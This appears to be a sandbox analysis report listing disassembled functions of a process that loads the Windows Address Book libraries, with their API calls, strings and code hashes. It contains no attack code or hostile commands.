                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 55f0c896b52608b26d3369bd16acde059e3be3fdb158ee07d3977cf93526f3e5
                                                                        • Instruction ID: bec0d82d49948eaee8e0883d0f44a35f189b97e6aa2498dc5aa9b0cd9f60e6e1
                                                                        • Opcode Fuzzy Hash: 55f0c896b52608b26d3369bd16acde059e3be3fdb158ee07d3977cf93526f3e5
                                                                        • Instruction Fuzzy Hash: 3241E8B59443159FDB27BF54DC493AAB7E8EB44F20F2100DAE90297790DB748A40CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 217 3828a4-3828e8 memset 218 38299d-3829aa call 3832b0 217->218 219 3828ee-382912 RegOpenKeyExW 217->219 221 382989-38298f 219->221 222 382914-382947 RegQueryValueExW 219->222 221->218 223 382991-382997 RegCloseKey 221->223 222->221 225 382949-382956 222->225 223->218 226 382958-38296b ExpandEnvironmentStringsW 225->226 227 38296d-382977 GetFileAttributesW 225->227 226->221 227->221 228 382979-382984 call 381a60 227->228 228->221
                                                                        APIs
                                                                        • memset.MSVCRT ref: 003828DE
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                        • RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 0038296E
                                                                        • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        Strings
                                                                        • Software\Microsoft\WAB\DLLPath, xrefs: 00382900
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                        • String ID: Software\Microsoft\WAB\DLLPath
                                                                        • API String ID: 2763597636-3156921957
                                                                        • Opcode ID: 580f2827386fc7135b51e3fe52ed599f4d2d8a11ee4a93c10ba915957130b730
                                                                        • Instruction ID: 63637434954a25c43c0b9a9e2a4c4de483f3f8bebf7eb808594b7a3085276d4d
                                                                        • Opcode Fuzzy Hash: 580f2827386fc7135b51e3fe52ed599f4d2d8a11ee4a93c10ba915957130b730
                                                                        • Instruction Fuzzy Hash: CE215EB594131CAADB22AB25CC8CEDBB7BCAF54710F1006DAE819E2151DB704B94CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 003828A4: memset.MSVCRT ref: 003828DE
                                                                          • Part of subcall function 003828A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                          • Part of subcall function 003828A4: RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                          • Part of subcall function 003828A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                          • Part of subcall function 003828A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00381C1E
                                                                        • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00381C34
                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00381C45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                        • String ID: wab32res.dll
                                                                        • API String ID: 1705514897-2698570859
                                                                        • Opcode ID: 0274250c52a70154f7e8323302093e84b2c57257031618101c45fd217dea0e84
                                                                        • Instruction ID: 283c2d02f21f4e12e823c87b441d2d6c9601e8ba6f419e6f779e13da3c63a7d2
                                                                        • Opcode Fuzzy Hash: 0274250c52a70154f7e8323302093e84b2c57257031618101c45fd217dea0e84
                                                                        • Instruction Fuzzy Hash: E5F030B5A013189BCB12FBB4DC49A9EB7BCAB44700F5141E5A512E7141DB30DF05CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00381BA8
                                                                          • Part of subcall function 003828A4: memset.MSVCRT ref: 003828DE
                                                                          • Part of subcall function 003828A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                          • Part of subcall function 003828A4: RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                          • Part of subcall function 003828A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                          • Part of subcall function 003828A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 00381BE2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                        • String ID: wab32.dll
                                                                        • API String ID: 2792020168-2849205143
                                                                        • Opcode ID: 34f160aedc4edbad6eb2c038e7635a740684f2988a6e0baf35ca042bf1fd1098
                                                                        • Instruction ID: 548e7506e984301a4cb38f430c43e544a26250e8d32627434dafff3694358270
                                                                        • Opcode Fuzzy Hash: 34f160aedc4edbad6eb2c038e7635a740684f2988a6e0baf35ca042bf1fd1098
                                                                        • Instruction Fuzzy Hash: 68F0F67580131897CF26FB68DC4A9EBB7BCEF50310FA141D4A8169B281EA305F0ACB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 003829C0
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 003829DE
                                                                        • RegisterApplicationRestart.KERNELBASE(00381428,00000000,00000000), ref: 00382A0B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                        • String ID:
                                                                        • API String ID: 3182635576-0
                                                                        • Opcode ID: 5d8863324bcd84fa432ab5ca9a368a3c18394b0d79525073bc69240dfb8c9f54
                                                                        • Instruction ID: 2e8ca37e38f62ba642570382478270bf46f899c59a455a6d607910d5fa94f82a
                                                                        • Opcode Fuzzy Hash: 5d8863324bcd84fa432ab5ca9a368a3c18394b0d79525073bc69240dfb8c9f54
                                                                        • Instruction Fuzzy Hash: F1015272910319BBDB16DBD4D889BAEB7BCEF44361F6000A5E501E7100DB789E0587A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: __getmainargs
                                                                        • String ID:
                                                                        • API String ID: 3565562838-0
                                                                        • Opcode ID: bc9149c3b3086dc3aaf7bc75c9e398d2f1c30a89edcb38b5487429764cb30aee
                                                                        • Instruction ID: 28d93698c25b28b500096c05a7163216e85ec6f4edd86b9fcfbbae65da2e48fe
                                                                        • Opcode Fuzzy Hash: bc9149c3b3086dc3aaf7bc75c9e398d2f1c30a89edcb38b5487429764cb30aee
                                                                        • Instruction Fuzzy Hash: 95C08CF0581382AAC30337243C079D3BB109841708F0300C1E322ABCA2E2540218A752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0038261B
                                                                        • memset.MSVCRT ref: 00382633
                                                                        • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0038264D
                                                                        • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 0038268D
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 0038287E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ArgvCommandFreeLineLocal
                                                                        • String ID: /LDAP:
                                                                        • API String ID: 439219084-3282177907
                                                                        • Opcode ID: 80c34f077a4e49a8a6b242619563798fd361d4c214c440917a2b25b29615c049
                                                                        • Instruction ID: 941596b53bece9793771b9b4e3209ce2a4d528e6a91e56ddead0b16d7c883b01
                                                                        • Opcode Fuzzy Hash: 80c34f077a4e49a8a6b242619563798fd361d4c214c440917a2b25b29615c049
                                                                        • Instruction Fuzzy Hash: 3B816075A013289FCF26EF24DC88AAAB7B9FF58300F1541E9E51AD7251DB309E858F50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(8,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?), ref: 00382ACC
                                                                        • HeapAlloc.KERNEL32(00000000,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382AD3
                                                                        • memcpy.MSVCRT ref: 00382AEB
                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382B37
                                                                        • HeapFree.KERNEL32(00000000,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382B3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                        • String ID: m(8
                                                                        • API String ID: 3405790324-3390150485
                                                                        • Opcode ID: 702255b6b7e7f2b160cbe6b7f49f0db01dcc502ab9596a1febf49895ed70d446
                                                                        • Instruction ID: b4d6e3fdce876769317b238cf0f2be9877b7654282fd5d72c81ddc72eeab63f9
                                                                        • Opcode Fuzzy Hash: 702255b6b7e7f2b160cbe6b7f49f0db01dcc502ab9596a1febf49895ed70d446
                                                                        • Instruction Fuzzy Hash: CE2105B1A02752AFDB2B7E2CD984B17BBA9FF04314F1241A5E9158B290DBB4DC50C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003836A2
                                                                        • GetCurrentProcessId.KERNEL32 ref: 003836B1
                                                                        • GetCurrentThreadId.KERNEL32 ref: 003836BA
                                                                        • GetTickCount.KERNEL32 ref: 003836C3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003836D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: 3c66073d265dbf93922b5907d500e362b582fad0a74d9f38754306936aec381d
                                                                        • Instruction ID: b898e73fffa46f3002df14aac451c6e5584da86ed0fa37902f658de54c9b6b9c
                                                                        • Opcode Fuzzy Hash: 3c66073d265dbf93922b5907d500e362b582fad0a74d9f38754306936aec381d
                                                                        • Instruction Fuzzy Hash: F211ECB1D01709EBCB11DFB8EA8869EBBF8FF58755F614495D501EB250E6309B009B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003833F6,`@8), ref: 003832C7
                                                                        • UnhandledExceptionFilter.KERNEL32(003833F6,?,003833F6,`@8), ref: 003832D0
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,003833F6,`@8), ref: 003832DB
                                                                        • TerminateProcess.KERNEL32(00000000,?,003833F6,`@8), ref: 003832E2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 7d3ebaa92c4ee39b770b4dc24a04e0ea0bedf52e4bf20b771b9f77f15a9c6119
                                                                        • Instruction ID: b26090d9c2a1b7b2c98d33c520ab9425b5b97c5bdf681aa64af2db7000d7a063
                                                                        • Opcode Fuzzy Hash: 7d3ebaa92c4ee39b770b4dc24a04e0ea0bedf52e4bf20b771b9f77f15a9c6119
                                                                        • Instruction Fuzzy Hash: 93D0CAB2000B08AFDB022BE1EC0CE493E2CFB88322F044480F30ECA020CB3188118BA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 00383455
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 970d35460f36341920b5c0a96055e706990403e02750d17d54585627d00f8969
                                                                        • Instruction ID: a2e6edfefcac751a8d088ccd6369171e21d3f8ac7c40b5acdd1fcf2da2c2fc5c
                                                                        • Opcode Fuzzy Hash: 970d35460f36341920b5c0a96055e706990403e02750d17d54585627d00f8969
                                                                        • Instruction Fuzzy Hash: E29002B035570046864327715C2E58529946A48B0BB9204D0E005C6159DB5041015751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 58
                                                                        • API String ID: 0-1845685940
                                                                        • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                        • Instruction ID: 77eec80bccae791ad3b8a300226f5ccfcbba4eb8be0b00b09c77ad234688030a
                                                                        • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                        • Instruction Fuzzy Hash: 91F0A0337142105B8B448B4EDC8097EB3DADEC5B3471A80AAE5098B702EA34ED428394
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 003834D8: GetModuleHandleW.KERNEL32(00000000), ref: 003834DF
                                                                        • __set_app_type.MSVCRT ref: 00382F92
                                                                        • __p__fmode.MSVCRT ref: 00382FA8
                                                                        • __p__commode.MSVCRT ref: 00382FB6
                                                                        • __setusermatherr.MSVCRT ref: 00382FD7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 3d7cf1b5ff69bc201e8c39074a4372e5fed712c328b1b046e3b96e48b786bd32
                                                                        • Instruction ID: 5886fce979e3f512c95724947a126ec817d3672a5a0c0cb5eb42fbcf1c77d1e7
                                                                        • Opcode Fuzzy Hash: 3d7cf1b5ff69bc201e8c39074a4372e5fed712c328b1b046e3b96e48b786bd32
                                                                        • Instruction Fuzzy Hash: 73F0F2B85447028FC71BBB70EC0A2193BA8BB05B21F2146D9E5629ABE1EBB58150CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%